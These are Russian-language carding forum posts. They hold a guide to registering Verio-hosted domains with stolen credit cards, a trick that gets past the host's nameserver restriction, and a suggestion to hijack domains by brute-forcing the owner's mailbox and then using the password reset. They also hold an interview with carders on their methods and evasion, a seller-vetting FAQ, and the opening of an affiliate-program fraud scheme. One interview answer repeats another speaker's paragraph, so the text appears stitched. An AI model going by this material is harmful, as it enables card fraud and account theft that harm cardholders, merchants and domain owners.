    Вообще, альтернатив Verio очень много — тот же www.register.com. Но все они, как правило, замораживают домен при отрицательном балансе на кредитке. В случае с Верио этого не происходит — домен умирает лишь по истечении периода существования зоны. А его, как известно, можно продлить без особых проблем [​IMG]. К тому же, если бабки на карте закончатся, Verio оставит клиенту не только домен, но и панель управления, где можно выполнить ряд действий: изменить зону, добавить почтовый аккаунт, выполнить апгрейд плана, посмотреть статистику и многое другое. Об этом я обязательно расскажу, но всему свое время.

    Регистрация — дело тонкое

    Итак, ты проникся и захотел стать клиентом Verio [​IMG]. Ты выбрал правильный путь, ведь если домен будет зарегистрирован с учетом следующих советов, никаких проблем не будет. Для успешной регистрации тебе понадобится рабочая (читай — с положительным балансом) кредитная карта с наличием cvv2 (специального защитного кода) и немного терпения. К слову о кредитке, совсем недавно Verio была чуть ли не единственной компанией, регистрирующей домены без cvv2-кода. Теперь все изменилось, и в форму было добавлено соответствующее поле. Но такому кардеру, как ты, достать cvv2, я думаю, будет несложно.

    На главной странице с правой стороны ты увидишь небольшую форму. Вводи туда желаемое имя домена и жми «Check it». Тебя перекинет на первую ступень регистрации — выбор домена. В случае если имя будет свободно, появится сообщение, иначе высветится форма для выбора альтернативного домена.

    Когда имя будет определено, наступает второй шаг регистрации — выбор плана хостинга. Тебе будет предложено два варианта — купить зону только для «парковки», либо выбрать специальный план для нее. Щелкай по второму пункту и попадешь на страницу с выбором типа регистрации. Советую выбрать UNIX GOLD PLAN. Пусть он и дорогой (около $100 за месяц), но проблем с переносом зон у тебя точно не будет. Хотя сложностей не будет при любом плане, так как существует один секрет, позволяющий обманывать защиту компании. Когда действия будут подтверждены, у тебя спросят личные данные. Из них ты, конечно же, занесешь только свой e-mail, остальные сведения будут о владельце карты. Кстати, за этим адресом будет закреплен твой личный аккаунт на Verio — при вторичной регистрации домена тебе потребуется лишь ввести свой пароль и/или инфу о новой кредитке.

    На предпоследнем шаге кардеру предстоит занести информацию о карте — на этом я не буду останавливаться, так как такие операции ты производишь очень часто.
    Ну и, наконец, для завершения сделки, подтверди свою покупку и получи благодарность от Verio. Компания пообещает отправить тебе письмо после проверки кредитной карты. Теперь один нюанс: если ты получаешь два письма с промежутком около 10 минут — все отлично, запрос прошел, и домен забит за тобой (первое письмо содержит запрос о регистрации, второе — правила хостинга). В противном случае — карта невалидна, и придется производить новую сделку.

    Через день на твой ящик придет еще одно письмо, на этот раз с данными о твоем домене. Теперь можешь прыгать от радости и ждать, пока обновятся зоны и твой домен будет откликаться на запросы [​IMG]. Поначалу довольствуйся IP-адресом, за которым закреплен личный FTP-доступ и панель управления именем. В довесок к этому будут предоставлены DNS-серверы и правила пользования хостингом.

    Прелести Control Panel

    Теперь можно проверить работу Control Panel и залогиниться под выданным аккаунтом. Панелька находится по адресу http://ip-address/stats/.. Для доступа к ней выдается 6-значный логин, который является частью твоего домена (например, для www.supercard.to логин будет superc). Пароль генерируется из 8 случайно взятых символов.
    Когда будешь внутри, не помешает сменить пароль на более удобный (но не менее сложный). Это делается во вкладке Change Password. Теперь самое время заняться раздачей e-mail аккаунтов. Если ты взял себе план выше, чем DNR (Domain Registration Only), то тебе будут предоставлены от десяти аккаунтов по POP3/IMAP, а также доступ к SMTP. Чтобы добавить новую POP3-запись, перейди в соответствующий раздел и задай пользователю логин и пароль. После этого жми Change, и аккаунт успешно добавится в базу.

    Иногда приходится добавлять редирект-запись, то есть адрес, с которого пришедшие письма будут автоматически пересылаться на указанный в форме мыльник. С этим ничего сложного, надо лишь чуть выше отметить значение формы, названное «All email not specifically forwarded will be sent to». В случае если аккаунта не существует, все письма будут автоматически пересылаться на этот адрес. Это очень удобно и позволяет полностью контролировать почтовую систему твоего домена.
    Для работы с e-mail существует приятная оболочка Webmail. Раньше она входила в любой хостинг-план на халяву, теперь же за нее просят 10 американских президентов ежемесячно (нашли, на чем нажиться [​IMG]). Но стоит сказать, что скрипты Webmail сделаны на ура — в них существует все, что пригодилось бы рядовому пользователю. Ссылка на Webmail - www.supercard.to/webmail/ либо http://webmail.supercard.to/..

    Также присутствует интересный раздел «Domain Manager», который находится вверху на панели инструментов. Там можно без проблем зарегистрировать виртуальный домен. Он будет подвязан к главному, а оплата будет производиться по этой же карточке. Таким образом, просто заполни форму регистрации и не заботься об оплате имени — все произойдет автоматически. Кстати, процедура регистрации займет минимальное время, так как необходимо лишь поставить галочку, подтверждающую, что клиент ознакомлен с правилами хостинга, а затем аккуратно заполнить список новых имен и срок регистрации (от года до десяти лет). Если все сделано правильно и домен не занят — тебя попросят подождать денек, пока обновятся зоны. Особых проблем с созданием виртуального домена нет. Кстати, изменить, а тем более перенести зону такого виртуального имени тебе не удастся. Придется довольствоваться разделом Edit Pointers. Там возможна лишь подвязка определенного хоста к IP-адресу (создание домена третьего уровня).

    Создание своих доменов

    Когда ты получаешь полный доступ к зоне своего домена, то появляется возможность создания своих сабдоменов (уже третьего уровня), а также других весьма полезных полей DNS. Все это можно сделать во вкладке «Zone File Editor», которая находится в первом пункте управления «Manage My Web site».
    Заходи туда и увидишь файл, в котором прописаны минимальные поля. В первую очередь, это SOA. Там находятся два e-mail адреса Postmaster’а и Hostmaster’а. Затем следует порядковый номер, время обновления и дата истечения срока зоны. Чуть ниже файла ты увидишь форму для новых записей, которую необходимо заполнить. Существует несколько параметров, разрешенных для добавления. Вот некоторые из них:

    A. Нужен для подвязки нового сабдомена к IP-адресу. Например, запись subdomain.supercard.to. IN A 127.0.0.1 будет означать, что имя будет ссылаться на локальный адрес. Кстати, точка в конце сабдомена обязательна — она означает конец записи (в противном случае адрес будет иметь вид subdomain.supercard.to.supercard.to, то есть присоединяться к главному имени).

    CNAME. Параметр позволяет создавать алиас для уже существующего имени. К примеру, admin.supercard.to. IN CNAME supercard.to. будет привязывать сабдомен к главному хосту, делая эти записи равнозначными.

    MX. Расшифровывается этот параметр как Mail eXchanger. Все SMTP-службы работают со значением опции, предварительно запрашивая его с сервера имен. Это удобно, поскольку делает постоянным хост с работающим на нем smtpd для каждого домена. Пример использования:smtp.supercard.to. IN
    MX 10 222.222.222.222. Число 10 означает приоритет записи, соответственно, полей MX может быть несколько.

    NS. Самая интересная опция, поскольку ее значение — NS-сервер для данного домена. Как я уже говорил, некоторые хостинги позволяют переносить записи с одного сервера на другой. Verio не исключение, но тут существует один нюанс. Дело в том, что если ты выбрал план DNR, изменить NS-сервер тебе не удастся (сценарий выругается на неверный план регистрации). Все было бы плохо, если бы не один трюк, позволяющий обмануть эту защитную систему. В случае, когда адрес NS-сервера содержит подстроку «verio», запрос обработается как надо, а адрес запишется в базу. Реализуется на практике это очень просто: в конфиге к твоему серверу приписывается следующая строка:
    verio.cardns.net. IN A 222.222.222.222,
    где 222.222.222.222 — IP-адрес сервера. После этого (когда зоны обновятся, а хост будет виден из глобала) можешь смело переносить DNS-сервер. Заполняем форму следующим образом:
    supercard.to. IN NS verio.cardns.net.
    Verio проглотит такой запрос, и через день зоны перенесутся на твою машину. Естественно, ты должен будешь позаботиться об этом заранее и составить конфиг для своего домена (он может совпадать с тем, что ты редактировал на Control Panel).

    Стоит рассказать и об оформлении прямой зоны домена (именно она и будет переноситься на посторонний сервер). Для этого необходимо задать в главном named.conf информацию о местонахождении и значении зоны. Это делается следующим блоком данных:
    zone «supercard.to» {
    type master;
    file «supercard.to.hosts»;
    allow-query { any; };
    };

    Здесь имя зоны — любое название (лишь бы ты понял, к чему ведет этот блок), тип — предназначение DNS, master или slave (во втором случае необходимо создать внутренний блок с masters-серверами). И, наконец, allow-query обрабатывает запросы от конкретных адресов (в нашем случае любой может запросить данные о домене). Параметров в блоке zone { } может быть много, каждый из них отвечает за определенную вещь. За подробностями иди в man named.conf.
    Теперь можно создавать файл supercard.to.hosts, который, как я уже говорил, не отличается от зоны на verio.net. Ты лишь можешь изменить первый параметр $TTL, который означает период, за который обновляются зоны. К примеру, его значение 1d говорит о том, что каждый день будет происходить синхронизация. Также допустимо указывать время в секундах. После всех модификаций конфигурационного файла bind, необходимо перезапустить демон. Для этого пошли процессу сигнал 1: killall -1 named.

    Брешь в безопасности Verio будет на пользу кардеру, так как при выборе плана DNR, он может без проблем перетащить зоны на отдельный сервер и радоваться жизни.
    TXT, SRV. Текстовые и служебные записи, которые могут быть внесены для разъяснения какой-либо информации. Так, например, можно уточнить некоторые электронные адреса. На них можно слать почту в определенных случаях (Spam, Abuse и т.п.).
    Последнего параметра PTR, организующего обратный резолв (IP-адрес в hostname), ты не обнаружишь. Это обусловлено тем, что вторая зона хранится у Verio и держится в строгом секрете [​IMG]. Ты же вполне можешь обойтись без PTR, создавая свои красивые виртуальные хосты (пусть даже в одну сторону) с использованием опции A.

    После такого описания параметров тебе несложно будет разобраться в прописке опций или переносе зон. Кстати, перенести их будет вполне логично, так как при отрицательном балансе на карте, Verio просто заблокирует FTP и WEB-доступ к сайту (останется только Control Panel). Все изменения в зонах будут немедленно отправлены на e-mail (под которым был зарегистрирован домен). Кстати, не забудь подтвердить редактирование. Это будет предложено сделать при нажатии на Submit.

    Продление аккаунта и апгрейд плана

    Как и любой хостинг, Verio поддерживает продление времени регистрации. Иными словами, когда у тебя заканчивается период, на который ты покупал домен, можно с легкостью его продлить. Возможно, потребуется найти другую кредитную карту. Для этого необходимо выбрать вкладку «Update Method» в разделе Billing твоей панели управления. Далее определить новые сроки и проплатить кредиткой с положительным счетом.

    С апгрейдом плана все немного сложнее. Именно поэтому я советовал выбирать его сразу при регистрации. Вот что получилось в моем случае, когда я выбрал Silver Plan и захотел поменять его на Gold. Как выяснилось, для этого нужно было написать письмо администратору Verio с запросом. Затем мне пришел ответ, что моя карта истекла, и теперь мне нужно отправить ему новые данные. Все было выполнено по указанию, но вот ответ администратора меня шокировал. Для того чтобы проапгрейдить план, мне надо было позвонить по телефону в Штаты и подтвердить голосом данные о кредитке. Я забил на это дело и остался с серебряным планом. Думаю, ты бы поступил так же.
    Как уже было написано, через два месяца при отрицательном счете Verio отрубит у тебя доступ к FTP и Web. Точнее, сотрет все твои каталоги и файлы, сам же вход будет возможным [​IMG]. Чтобы успеть забэкапить всю важную информацию, просто следи за почтовым ящиком — за три дня до события тебе упадет письмо, в котором будет написано об отключении аккаунта.

    Забыли пароль?

    Всякое может случиться, и запамятовать пароль на Control Panel может любой человек. Verio имеет автоматическую систему высылки подобной информации.
    При логине на Web-админку ты увидишь стандартный запрос пароля от Apache. Если его ввести неверно три раза, сервер переведет тебя на страницу 403. Помимо ругани о неверном пароле, ты найдешь ссылку, ведущую на скрипт высылки забытого пароля. Никакой контрольной фразы и дополнительных данных — просто нажми «Send», и инфа уйдет на твой мыльник (за которым закрепляется домен).

    Кстати, тут может возникнуть ряд идей, о хищении домена у владельца. Достаточно намутить простой POP3-брутфорс (либо просто увести мыло, на которое регился домен) и запросить данные на него — все, имя твое! Правда, учитывай, что хозяин запросто может его вернуть [​IMG], но ничто не мешает тебе выслать пароль во второй раз.

    Всем спасибо, все свободны!

    Любой хостинг можно описать подобным образом. У каждого есть свои достоинства и недостатки, я это говорю с полной уверенностью, так как был клиентом пяти различных компаний. И этой статьи не было бы, если бы Verio не оправдал все мои ожидания. Конечно, у него есть свои минусы, так как идеального хостинга не существует, но сохранение всех зон и доступа к Control Panel после истечения срока кредитки меня весьма порадовало. Это не оставит равнодушным и тебя, ведь любой кардер не любит таких глобальных проблем, как утеря домена. Я думаю, ты не исключение.
    Verio — далеко не единственная компания, предоставляющая услугу регистрации домена второго уровня. Вот краткий список подобных серверов.

    www.networksolutions.com — регистрация доменов в зоне .com, .net, .org.
    www.register.com — .com, .net, .org, а также .biz и .info.
    www.tonic.to — обслуживание доменов в зоне .to.
    www.inc.ru — единственный ресурс по оформлению доменов .ru.


    Вопросы?

    Control panel на Verio.net снабжена множеством ссылок на Help. Например, можно найти помощь по каждому хостинг-плану, FTP-доступу, webmail, виртуальным доменам, зонам и т.д. Кроме того, как утверждают на главной странице, любые вопросы, заданные по мылу, обязательно будут разрешены в короткие сроки.

    Работа с DNS

    Для проверки работоспособности зон нередко приходится пользоваться утилитой host. Вот полезные опции, которые могут тебя заинтересовать:
    host -l hostname - выводит полный список сабдоменов, подвязанных к hostname.
    host -t TYPE hostname - выводит значение параметра TYPE, который может иметь значение MX, NS и др. Обо всех опциях было подробно рассказано.
    host hostname - выполнить преобразование hostname в IP-адрес.
     
    Cboloch нравится это.
  4. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Интервью с живыми кардерами

    Какие-то зашуганные люди эти кардеры. Стучишься к ним в асю, предлагаешь интервью провести, объясняешь, что приватная инфа тебе на фиг не впала, что хочется просто поговорить «за жизнь». Так нет, плотно морозятся. Ведь я, возможно, полковник Мусоров из ФБР, сплю и вижу, как засадить всех на нары :).
    Короче, нервов мне попортили изрядно. Но мир не без добрых людей. На мое предложение откликнулись двое (настоящие имена и ники, естественно, не публикуются — прим. ред.).

    XS: Сколько времени ты уже занимаешься кардингом? Расскажи о том, как и почему ты в это втянулся? Каким было первое дело, которое ты провернул?

    dos: Серьезно занимался вещевым кардингом около года, 4 месяца назад бросил. Первой вещью, которую выслали, был простенький цифровой фотик. Радовался тогда, как слон. Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало. Бросил кардинг из-за того, что меня кинули подряд два человека. Кинули на дорогую электронику, которую я заказал, а долю свою не получил. У меня просто опустились руки, не хотелось дальше продолжать. Кардинг на самом деле очень нервное занятие.

    XS: Насколько серьезно ты заботишься о своей privacy? Например, меняешь ли ты квартиры в целях конспирации? :) Доверяешь ли приватную инфу проверенным людям?

    dos: Квартиры меняют только параноики. Инфу доверяю. Гораздо важнее не болтать о своем занятии направо и налево всяким друзьям-знакомым.

    ВГ: Достаточно понимать, что ты делаешь, и как это может повлиять на твое дальнейшее будущее. Например, это интервью… По-моему, получилось хорошее размышление вслух ни о чем :). Для меня не существует проверенных и не проверенных людей. Есть друзья, и есть те, с кем у меня только деловые контакты.

    XS: Как, по-твоему, кардинг — это однозначно воровство или увлеченность знаниями об устройстве платежных систем? :)

    dos: Кардинг — такое воровство, которое не имеет явной направленности против человека. Убытки от кардеров терпят банки и интернет-магазины, но не конкретные люди.

    ВГ: Термин придумал не я. И тот, кто его придумал, дал конкретное ему объяснение. Кардинг — махинации при помощи кредитных карт и всего, что имеет к ним отношение (именно поэтому всех, кого судили за кардинг, судили по статье за мошенничество, а не за воровство).

    XS: Есть ли у тебя легальная работа? Если да, расскажи о ней, если нет — почему не устроишься, и кем бы ты предпочел работать?

    dos: Учусь в вузе на первом курсе. В будущем работа будет связана с защитой информации. Вполне возможно, что информацию придется защищать от тех же кардеров.

    ВГ: Легальная или наемная? Легальная есть, а наемная (когда работаешь в какой-то компании) была, даже несколько, но… Вообще, я с радостью трудоустроюсь, когда в нашей стране начнут оплачивать труд должным образом, а не по 800-1500 долларов в месяц при 10-часовой занятости. При этом твой начальник ездит каждый день на новых шестисотых и семерках, а его сын, работающий с тобой же, но по 2-часовому дневному графику и 2-3 дня в неделю из пяти, получает 5000 долларов. И то «на мороженое». Предпочел бы работать в какой-нибудь из спецструктур. Например, на букву Ф :).

    XS: Насколько сложно сейчас быть кардером? Какими знаниями и качествами нужно в первую очередь обладать? Какова специфика современного кардерства, изменилось ли что-то по сравнению с прошлыми годами?

    dos: Сейчас кардинг переживает не самые лучшие времена. Знания зависят от направления кардерства. Если это интернет, то надо уметь хорошо организовать защиту и анонимность. Если это реальный кардинг, то очень кстати приемы НЛП и обаяние :).

    ВГ: Ничего не изменилось. Кардерство всегда было занятием для дебилов. Это не хакерство, где нужны знания в области операционных систем и программирования. В кардерстве не нужно иметь каких-то специализированных знаний. Большинство «нынешних» кардеров — очень тупые люди, не умеющие делать НИЧЕГО, кроме того, чтобы где-то что-то красть.

    XS: Какие сейчас самые популярные способы кардерства? Какие считаются самыми профессиональными (требующими высокой квалификации)?

    dos: Самого популярного способа не существует, каждый зарабатывает как может. Самыми профессиональными, наверное, являются взломы банковских каналов передачи данных и различных алгоритмов шифрования электронных подписей.

    ВГ: Самые популярные, наверное, аукционы. Потому что они требуют минимума знаний. Точнее, вообще их не требуют. Самый профессиональный, скорее всего, пластик. В нем хотя бы надо понимать устройство и алгоритм работы.

    XS: Каково, по-твоему, соотношение серьезных кардеров (людей, которые углубленно изучают новые системы денежных платежей и внедряют свои способы обхода защиты) к парням, ищущим легкого хлеба при минимуме затрат времени?

    dos: Вокруг кардинга крутится огромное количество народа, но реально что-то делает только один процент из них. Легкого хлеба в кардинге нет в принципе. Может быть, в 1997 можно было что-то поиметь, не утруждая себя изучением темы, но не сейчас.

    ВГ: Матерых сейчас очень мало. 70%, если не больше — шушера, которая тупо делает copy/paste информации из какого-нибудь текстовика paypal.txt в веб-браузер. Да, они, возможно, знают все настройки и возможности аккаунтов в этой платежной системе, но лично я не считаю это серьезными познаниями из области кардинга, так как все это знают большинство юзеров, пользующихся системой легально.

    XS: Как ты думаешь, имеет ли кардинг «наркотический эффект»? Возникает ли привыкание к легким деньгам, и насколько оно серьезно?

    dos: Что-то такое есть. Как-то я с температурой 40 не мог отойти от компа, потому что очень хорошо кардилось :).

    ВГ: Имеет эффект осознания того, в какой жопе мы живем в нашей стране и насколько абсурдна и ничтожна тут жизнь. Хотя у каждого по-разному. Тут, опять же, все зависит от самого человека. Для кого-то это не более чем игра, цель которой — сделать гадость другому.

    XS: Насколько активно правоохранительные органы борются сейчас с кардерами? Насколько успешно у них это получается? Какие организации занимаются проблемами кардерства? Из-за чего обычно попадаются кардеры?

    dos: Борются, причем очень даже неплохо. Занимается этим ФСБ совместно с банками. Примерно раз в полгода устраивают облавы. Попадаются кардеры из-за своей неосторожности, а также из-за подстав.

    ВГ: По-моему, активности с их стороны вообще нет. Там ведь тоже не идиоты работают. Понимают, что им нет смысла тратить свои силы, время и деньги на то, чтобы «спасать» граждан США (или любой другой страны). Делать ту работу, которой должна заниматься забугорная полиция. Хотя с отморозками, которые пытаются кидать здесь (на территории России) — с ними борются. Но таких, по-моему, очень мало. С ними в основном разбирается внутренняя служба безопасности конкретного банка.

    XS: Были ли проблемы с ментами лично у тебя? Если да — расскажи, как попался и из-за чего. Чем все кончилось?

    dos: У меня проблем не было. Но был случай, когда я весь вечер кардил, а потом заметил, что работаю без прокси-сервера. То есть меня потенциально могли без проблем выследить. Потом неделю ходил по улицам, оглядываясь. Все казалось, что за мной следят :).

    ВГ: У меня? Проблемы? О чем ты? Я законопослушный гражданин и честно плачу налоги :).

    XS: Какие основные правила должен знать каждый кардер (если не хочет, чтобы его прижучили)?

    dos: Надо соблюдать анонимность. Работать с людьми, которым доверяешь. И не болтать много о том, какой ты крутой кардер.

    ВГ: Те же, что и у хакера: не светить свой IP, не светить свои данные. Проще говоря, делать так, чтобы улик твоей причастности к какому-либо делу было как можно меньше. Или вообще не было :).

    XS: Существуют ли в России профессиональные команды, которые имеют ежемесячный оборот средств от кардинга в сотни тысяч или даже миллионы долларов?

    dos: Существуют. Называть их, естественно, не буду. Такие команды принято называть семьями. Но чисто российскими их нельзя назвать, так как они рассредоточены по всему миру.

    ВГ: Смотрите новости по ти-ви, там про них в последнее время что-то часто стали рассказывать :).

    XS: Возможно ли сейчас обуть с помощью кардерства за раз на гигантскую сумму? Скажем, на десять миллионов баксов? Как это возможно в общих чертах?

    dos: Можно, но очень-очень трудно. Можно, например, проникнуть в банковскую сеть так, чтобы никто не заметил, и с нескольких счетов перевести бабки на свой. Потом надо снять бабки со счета, пока банк ничего не просек, и убираться на какой-нибудь остров в Тихом океане.

    ВГ: Несмотря на то, что определение кардерства по-прежнему «махинации с кредитными картами», на самом деле сейчас это уже более обширная тема. В нее влились такие направления, как махинации со счетами в разных платежных системах (PAYPAL, например). В силу развития интернет-технологий и электронных платежей, «обуть» можно и на 100 миллионов, но тогда это уже будет не кардерство, а хакерство. Или как это официально называется в США — identity theft. Ты берешь чужой логин и пароль от доступа через интернет к его банковскому счету, и, если там лежат 100 миллионов, переводишь их на свой счет. Что касается кредиток… как я уже сказал ранее, смотрите телевизор. Там рассказывается и о методах, и о суммах, которые имеются с этих методов :).

    XS: Расскажи, какие сейчас самые навороченные способы защиты, применяемые в кредитных картах? И в общих чертах способы их обхода, применяемые кардерами.

    dos: Да, как таковых, новых способов нет. Вот виза, например, недавно взяла и резко сократила процент непроверенных транзакций, из-за этого многие биллинги закрылись, и кардеры потеряли еще одну возможность зарабатывать.

    ВГ: Принцип работы всех кредитных карт одинаков. И применительно к сети нельзя говорить о способах защиты самих карт. Тут они не играют уже никакой роли. Другое дело — способы защиты передачи и хранения информации с этих карт в интернете. А эти способы, как показывает практика, полная херня… Так как сейчас 80% (или даже 90%) всех кардерских дел осуществляется через интернет, то все вертится вокруг кражи информации из интернета. И тут все как обычно…

    XS: Отличается ли чем-то кардинг в России от кардинга в других странах? Например, в Америке? Может, есть какая-то своя специфика.

    dos: Каждый американец с рождения трясется за свою кредитную историю, в которую заносятся все крупные покупки и т.п. Если человек будет замешан в чем-то плохом, это сразу же отразится на его кредитной истории. И потом ему не дадут кредит, не примут на работу. Поэтому большинство американских кардеров являются эмигрантами из СНГ :).

    ВГ: Ага, отличается. Там преобладают негры :).

    XS: Существует ли кардерская «сцена» как таковая? Есть ли в carders community свои звезды, легендарные личности? Насколько развито и велико сообщество кардеров?

    dos: Конечно, есть. Называть имена не буду. Трудно оценить все сообщество кардеров. В России, думаю, несколько тысяч человек.

    ВГ: Про это в вашем журнале уже рассказывал один мальчик год или два назад :).

    XS: Какие сайты/IRC-каналы являются центровыми для кардеров? Где собираются действительно знающие люди? Какие самые, на твой взгляд, достойные сетевые ресурсы по теме кардерства?

    dos: www.carderplanet.com.

    ВГ: Достойные люди не собираются на сайтах или тематических кардерских каналах :). Кардерпленет.ком — про него уже писали. Те, кто интересуется кардингом, могут обращаться туда.

    XS: Какие страны в мире (и в СНГ) являются лидерами по кардерской активности? Существует ли какая-то зависимость, например, от общего уровня жизни?

    dos: В мире: Россия, Америка. В СНГ: Россия, Украина. Зависимости не существует из-за того, что все деньги, которые получают кардеры, распределяются в пределах небольшой группы.

    ВГ: В мире — Индонезия :), а также страны бывшего соцлагеря. В СНГ — Украина, Россия, Прибалтика.

    XS: Каким ты видишь кардерство через десять лет? Куда все, по-твоему, идет?

    dos: Через десять лет, имхо, исчезнут, наконец, кредитные карты. Но, несомненно, будут люди, которые будут заниматься электронными махинациями с денежными потоками. В том виде, в котором кардинг существует сейчас, все движется к закату кардинга.

    ВГ: С развитием беспроводных технологий и базирующихся на этом технологий оплаты товара, а также технологий «физической» оплаты картами через интернет (когда, чтобы сделать оплату на сайте, ты должен вставить свою или чужую :) карту в кардридер, подключенный к компьютеру, и ввести несколько пин-кодов), кардинг превратится в нечто среднее между фрикингом и хакерством. Придется красть информацию, а потом применять ее путем эмуляции через какое-то устройство.

    XS: Что бы ты посоветовал парням, которые не знают, что такое кардинг и как это вообще, но хотят легких денег, хотят стать кардерами?

    dos: Главное — не надеяться, что деньги сразу потекут рекой. Кардинг — очень трудное занятие. Для начала надо просто начать тусоваться на кардерских форумах, вникать в тему, задавать вопросы. Через некоторое время, возможно, подвернется какая-нибудь работа. Или ты сам поймешь, что твоих знаний уже достаточно для занятия кардингом. Важно понять, что никакой добрый дядя не станет объяснять, что и как делается — до всего придется в основном доходить самостоятельно.

    ВГ: Легкие деньги бывают редко. Поэтому, если хочешь хорошей и человеческой жизни, учись, получай качественные профессиональные знания и уезжай отсюда на@^#! Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало.
     
  5. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    В данном FAQ приведены несложные рекомендации, которые помогут вам при покупке товаров или заказе услуг выбрать надежного продавца и не стать жертвой мошенников. Обращаю внимание, что это рекомендуемые, а не критические требования и не все, кто им не соответствуют, непременно мошенники.

    1. Положительные отзывы. Хорошие продавцы обычно имеют много рекомендаций довольных клиентов. Начинайте именно с проверки отзывов на ресурсе, обычно они публикуются в теме с предложением. Отзывы можно подделать, потому обращайте внимание на то, сколько времени прошло с момента регистрации «довольного клиента» до момента написания им отзыва в топике, а также, сколько всего сообщений оставил пользователь, кроме написанного отзыва. Дорогого стоят отзывы старых и авторитетных участников. Возможно, продавец опубликовал на проекте несколько предложений, и в каждом из них вы найдете отзывы о работе с ним.

    2. Отсутствие жалоб в разделе Арбитраж проекта. Все жалобы от клиентов (и не только) обычно публикуются и рассматриваются администрацией в разделе Арбитраж проекта, не забывайте заглянуть туда при оценке надежности продавца.

    3. Наличие успешных сделок через ГАРАНТ-сервис. После проведения успешной сделки, представитель ГАРАНТ-сервиса всегда информирует об этом других участниках в теме продавца. Писать от имени ГАРАНТ-сервиса могут только Супер-модераторы и Администраторы проекта. Отзыв от ГАРАНТ-сервиса надежнее любых отзывов пользователей.

    4. Статус ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Статус участника на форуме должен быть максимально высоким, на нашем форуме администрация рекомендует работать только с участниками со статусом ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Данные участники выделяются зеленым цветом, они проходят проверку администрации на качество товара/услуг. Мы проверяем наличие профилей на других ресурсах, наличие негативной и положительной информации в поисковиках, и информируем об этом других участников ресурса.

    5. Оплаченная реклама. Посмотрите, есть ли у продавца платная реклама. Обычно мошенникам это не требуется, у них иная задача, раскидать предложения по интернету, найти жертву и обмануть. С другой стороны, надежные и честные селлеры, которые хотят постоянно продавать свой товар на площадке, в большинстве случаев, покупают рекламные места. (!) Оплаченная реклама еще не означает, что это ПРОВЕРЕННЫЙ ПРОДАВЕЦ, заказать рекламу можно и без прохождения проверки.

    6. Работа через ГАРАНТ-сервис. Вы всегда можете проводить сделки через ГАРАНТ-сервисов сторонних форумов. ГАРАНТ-сервис – это надежная защита от мошенников, но только, если вы не забываете про остальные 9 пунктов данного FAQ.

    7. Не гонитесь за дешевизной. Уважающие свою работу продавцы имеют достаточно клиентов и хорошо знают рынок, потому никогда не станут продавать свои товары/услуги за копейки. Дешевая цена – инструмент мошенников, а ваша жадность может привести к бедности.

    8. Также не забывайте что темы проверенных продавцов помещаются в раздел Проверенные селлеры
    Удачных Вам покупок.

    Как делали бизнес новички кардинга

    В этой статье будет описан один из немногих способов кардинга, интересный для новичков в этом деле. Сразу предупрежу, что все нижесказанное не следует применять на практике, т.к. это противозаконно и может повлечь наказание по статьям 272, 273 УК РФ, а также рассматриваться как мошенничество. Автор статьи никогда не использовал эти материалы на практике. Статья написана исключительно в образовательных целях.

    Давай вкратце рассмотрим основную идею этого метода. В интернете есть множество организаций, которые делают в Сети бизнес. Очень часто можно встретить сайты, на которых предлагаются услуги хостинга, аренды серверов, продаются темплейты и скрипты для веб-мастеров. Эти компании различным образом рекламируют свои услуги, и одним из методов рекламы являются партнерские программы. Они могут быть разными, но в большинстве случаев тебе предлагают рекламировать на своем сайте товар или услугу, обычно посредством баннера. За каждого клиента, пришедшего по ссылке с твоего сайта и купившего этот товар, ты получаешь процент или некоторое фиксированное вознаграждение. Поскольку такие услуги или товары обычно являются виртуальными, то компания предлагает удобные способы их оплаты, такие, как электронные платежные системы, и, конечно, кредитные карты. В общем, если у тебя есть раскрученный веб-проект с большой посещаемостью, ты можешь работать по партнерской программе вполне легально.

    А теперь подумай, что произойдет, если кто-нибудь сделает сайт, создаст видимость его нужности и посещаемости и разместит на нем баннеры партнерской программы. Допустим, его партнером будет компания, предоставляющая услуги хостинга. Далее — он сам выступает в роли покупателя: заходит на свой сайт, кликает по баннеру и попадает на страницу партнера. Выбирает интересующий его тарифный план и покупает хостинг. Только вот покупать он его будет не на свои деньги, а на чужую кредитную карту. В итоге все довольны: партнер приобрел клиента, а кардер получил процент от сделки. Как получить этот процент и превратить его из виртуальных денег в реальные и будет подробно описано ниже.

    Итак, для начала необходимо:

    Стартовый капитал (примерно 300-400 долларов).

    Знание HTML, графических редакторов.

    Начальные знания английского языка (знания других языков приветствуются).

    Компьютер, доступ в интернет, прямые руки, немного серого вещества в голове.

    Предполагаемая прибыль: от $500 в месяц и выше.

    Подбираем партнера



     
  6. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Для начала нам надо подобрать партнера, чьи услуги или товары придется рекламировать. Искать партнера среди наших компаний и компаний на территории бывшего СССР бесполезно. Во-первых, потому, что это нарушает неписаные законы кардеров, во-вторых — потому, что нехорошо обманывать своих. Тем более что за бугром подобных компаний намного больше, да и платят они очень приличные деньги. Найти партнера несложно, для этого надо зайти в гугл (www.google.com) и набрать в строке поиска: «affiliates program» (партнерская программа). По запросу гугл выведет огромное количество компаний, предлагающих различные товары и услуги и приглашающих тебя стать их партнерами. Не стоит кидаться на первый попавшийся сайт, сначала лучше пройтись по разным компаниям и изучить их условия. Лучше всего, конечно, найти партнера, который будет выплачивать заработанное с помощью WebMoney или на E-Gold. Компании же, предлагающие такие способы выплат, как paypal или наличные, следует отметать сразу.

